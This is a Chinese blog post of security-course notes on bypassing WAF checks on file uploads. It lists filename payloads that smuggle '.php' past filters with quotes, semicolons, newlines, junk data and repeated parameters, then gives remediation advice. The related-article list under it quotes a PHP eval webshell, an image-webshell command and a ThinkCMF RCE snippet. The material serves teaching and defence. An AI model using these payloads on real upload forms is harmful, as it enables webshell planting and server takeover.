<小迪安全>-文件上传之WAF绕过及安全修复

已于 2023-03-25 11:26:04 修改
阅读量170 收藏
点赞数
分类专栏: 安全入门 文章标签: 安全
于 2023-03-23 23:20:45 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hackerXxxt/article/details/129739806
版权
  1. #上传参数名解析: 明确哪些东西能修改?

Content-Disposition:一般可更改

name:表单参数值,不能更改

filename:文件名,可以更改

Content-Type:文件MIME,视情况更改

常见绕过方法

 数据溢出-防匹配(xxx...) :就是在关键点前面写入大量的无用数据来干扰对后面主要数据的检测

符号变异-防匹配(' " ; ):有的检测可能是基于单引号和双引号来获取数据,可以修改单引号或双引号的位置或增加删除单双引号来干扰waf

数据截断-防匹配(%00; 换行)

重复数据-防匹配(参数多次)

Payload : 大量垃圾数据缓冲溢出(Ccontent-Disposition,filename等)

#单引号、双引号、分号

filename=x.php

filename="x.php

filename='x.php ;

filename="a.jpg;.php";

# %00、换行

filename="Content-Disposition : form-data;name="upload_file" ; x.php"

filename="x.jpg" ;

filename="x.jpg" ; . . . ..filename="x.php";

filename=

"x .

p

h

p"

;

  • 垃圾数据

  •  修改单/双引号

  • ;截断

  •  重复参数

  • /绕过 

 #文件上传安全修复方案

后端验证:采用服务端验证模式后缀检测:

基于黑名单,白名单过滤M工ME检测:

基于上传自带类型检测

内容检测:文件头,完整性检测

自带函数过滤:参考uploadlabs函数

自定义函数过滤:function check_file(){ }

WAF防护产品:宝塔,云盾,安全公司产品等

资源

https://github.com/fuzzdb-project/fuzzdb 

TheKingOfDuck/fuzzDicts: Web Pentesting Fuzz 字典,一个就够了。 (github.com)

hackerXxxt
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
第24天:WEB漏洞-文件上传WAF绕过安全修复1
08-03
Content-Disposition:一般可更改name:表单参数值,不能更改filename:文件名,可以更改Content-Type:文件 MIME,视情
文件上传之,waf绕过(24)
最新发布
san3144393495的博客
05-20 1450
前期upload第二关的时候,判断的方式就是mime的类型的绕过绕过miem是图片类型就可以上传,没有验证后缀,这是代码的判断,我们在来探针一下防护软件是怎么判断的,现在第二关上传一个图片上去,抓住数据包,mime满足就可以上传,所以把上传的文件名字改成php格式,本来这是可以正常上传成功的。mime可以作为一个验证条件,验证mime来判断你个文件一个合法性的时候,可以通过更改mime来达到一个伪造,比如上传一个php文件,这时候可以更改为图片类来尝试绕过mime验证。
文件上传的一些简单绕过
qq_52469895的博客
04-10 1876
文件上传宝塔WAF 0x00:写在前面 0x01:上传绕过后缀检测的姿势 方法1:文件名14.\np\nh\np绕过(如下0x02的方法1所示) 方法2:0a污染就能传php了(改hex) 0x02:绕过宝塔waf检测的文件内容书写 方法1:文件名14.\np\nh\np绕过,用个deskop.ini做一下污染 写马。 deskop.ini污染,就是类似windows dos窗口下制作图片🐎一样,二进制揉在一起。 POST /sandbox/i9pkda6liup7jd81u
WAF绕过-漏洞利用之注入上传跨站等绕过
xhscxj的博客
02-22 1826
waf主要拦截的就是上图漏洞 SQL 注入 如需 sqlmap 注入 修改 us 头及加入代理防 CC 拦截自写 tamper 模块 安全狗:参考之前 payload Aliyun:基本修改指纹即可 宝塔:匹配关键字外加/*等 sqlmap --proxy="http://127.0.0.1:8080" --tamper="waf.py" --random-agent #文件上传 1.php 截断 参考前面上传 waf 绕过 payload #XSS 跨站 利用 XSStrike 绕过 加上--tim.
小迪安全】Day24web漏洞-文件上传漏洞之WAF绕过
qq_44312640的博客
11-08 305
介绍文件上传漏洞的WAF绕过方法
4.任务096:SQLMAP自动注入绕过WAF , IPS
qq_41860876的博客
11-24 756
Injection: These options can be used to specify which parameters to test for, provide custom injection payloads and optional tampering scripts -p TESTPARAMETER Testable parameter(s) ...
第28天:WEB漏洞-XSS跨站之WAF绕过安全修复1
08-03
WEB 漏洞-XSS 跨站之 WAF 绕过安全修复#常规 WAF 绕过思路标签语法替换特殊符号干扰提交方式更改垃圾数据溢出加密解密算法结合其他漏洞绕过#自动化
2022年文件上传漏洞绕过姿势整理,过waf
11-20
2022年文件上传漏洞绕过姿势整理,过waf版,绕过思路:对文件的内容,数据。数据包进行处理。2.通过替换大小写来进行绕过
WAF绕过的各种方法总结.pdf
07-09
WAF绕过的各种方法总结总结语2019年7月9日,仅供学习参考,请勿用于非法用途
第47天:WAF绕过-漏洞发现之代理池指纹被动探针1
08-03
1.扫描速度-(代理池,延迟,白名单等) 2.工具指纹-(特征修改,伪造模拟真实用户等) 3.漏洞 Payload-(数据变异,数据加密,白名单等)
小迪渗透笔记:文件上传(2)
qq_52696970的博客
04-02 2034
文件上传(2)1、后端绕过(1)图片马的制作(2)文件头检测(3)图像文件信息判断(4)逻辑安全(5)目录命名+数组接收(6)CVE漏洞2、解析漏洞3、编辑器漏洞4、文件上传思路 1、后端绕过 代码问题漏洞 (1)图片马的制作 copy 1.png /b + shell.php /a webshell.jpg 直接在图片中插入(十六进制)webshell:<?php @eval($_POST['x']);?> (2)文件头检测 一般用十六进制器修改(burpsuit抓包修改头文件) JPEG (
小迪渗透笔记:文件上传(1)
qq_52696970的博客
04-02 2667
文件上传(1)1、概述2、常规文件上传地址获取3、文件上传基础4、黑名单绕过5、白名单绕过 1、概述 (1)什么是文件上传漏洞? 程序对文件的上传未作全面的限制,导致用户可以上传一些超越用户权限的文件,可以是木马,shell脚本,病毒等。 (2)危害 可以成为网站后门webshell获取权限 (3)漏洞的查找和判断 黑盒查找:扫描敏感文件获取上传地址;功能点测试;后台处的文件上传(后台权限不等于网站权限) 白盒查找:拿到网页源码后,通过代码分析是否有文件上传漏洞 判断:抓包或测试 注:文件上传类型的分析
文件上传的各种绕过方式
qq_59357741的博客
08-11 7859
常见的文件上传的各种漏洞
web漏洞“小迪安全课堂笔记”文件操作安全文件上传
weixin_42902126的博客
03-22 3032
思维导图 利用思路 什么是文件上传漏洞? 指程序对文件的上传未作全面的限制,导致用户可以上传一些超越用户权限的一些文件,可以是木 马,shell脚本,病毒等。 文件上传漏洞有哪些危害? 可以通过文件上传漏洞上传webshell后门。 文件上传漏洞如何查找及判断? 黑盒: 使用扫描工具扫描打开网站。 黑盒:测试会员中心,测试后台。 白盒:直接撸源代码。 文件上传漏洞有哪些需要注意的地方? 拿到漏洞后要对漏洞类型进行区分,编辑器、第三方应用、常规等。区分漏洞类型。 关于文件上传漏洞在实际应用中的说明? 上传
实战绕过宝塔PHP disable_function 限制getshell
zhangge3663的博客
03-09 3688
一、这次做的目标站点是一个某XX站点,通过前期的信息收集,可以发现该站点是由宝塔(一般根服务器开放端口888、8888和报错界面判定)+ShuipfCMS框架搭建的 端口信息 后台 二、默认的ShuipfCMS系统后台访问http://www.xxx.com/admin/会自动跳转到后台,但是这个站点感觉是被二次开发过的,站点后台和前端页面不在同一个子域名下,该后台还是通过收集子域名得到的,访问某xxx.xxx.com会自动跳转到后台登录页面。 三、这里想着尝试绕过验证码来对后台用户名密码进
实战|记一次绕过宝塔防火墙的BC站渗透
热门推荐
zhangge3663的博客
05-06 1万+
0x00 信息收集 由于主站存在云waf 一测就封 且初步测试不存在能用得上的洞 所以转战分站 希望能通过分站获得有价值的信息 这是一个查询代理帐号的站 url输入admin 自动跳转至后台 看这个参数,猜测可能是thinkCMF 0x01 getshell thinkcmf正好有一个RCE 可以尝试一下 ?a=fetch&templateFile=public/index&prefix='' &content=<php>file_put_content
文件上传waf绕过安全维护
硫酸超的博客
08-12 287
文件上传waf绕过安全维护上传参数名解析常见绕过方法数据溢出-防匹配(xxx...)符号变异-防匹配(' " ; )数据截断-防匹配(%00 ;/换行)重复数据-防匹配(参数多次)fuzz安全修复 上传参数名解析 明确那些东西能修改? Contont-Disposition:一般可更改 name:表单参数值,不能更改 Filename:文件名,上传的文件,可以更改 Content-Type:文件MIME,视情况更改,判断滤机制里面是不是通过这个这个属性值来过滤的 见upload-labs-master
Getshell | 文件上传绕过整理
重新启程
11-07 792
WAF绕过 安全绕过 1.绕过思路:对文件的内容,数据。数据包进行处理。 关键点在这里Content-Disposition: form-data; name="file"; filename="ian.php" 将form-data; 修改为~form-data; 2.通过替换大小写来进行绕过 Content-Disposition: form-dat...
第24天-WEB 漏洞-文件上传WAF 绕过安全修复
MCTSOG的博客
03-09 680
思维导图 知识补充 上传参数名解析:明确哪些东西能修改? Content-Disposition:一般可更改 name:表单参数值,不能更改 filename:文件名,可以更改 Content-Type:文件 MIME,视情况更改 常见绕过方法: 防匹配:让检测机制,找不到关键字 (php asp aspx 等) 数据溢出-防匹配(xxx…) 符号变异-防匹配(’ " ;) 数据截断-防匹配( /; 换行) 重复数据-防匹配(参数多次) Payload: 大量垃圾数据缓冲溢出(Content-Disp
如何防止文件上传绕过WAF
05-20
要防止文件上传绕过WAF,可以采取以下措施: 1. 文件扩展名过滤:通过对上传文件的扩展名进行过滤,只允许上传指定类型的文件。同时,需要注意的是,黑名单式的过滤不如白名单式的过滤安全。 2. MIME类型过滤:WAF...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值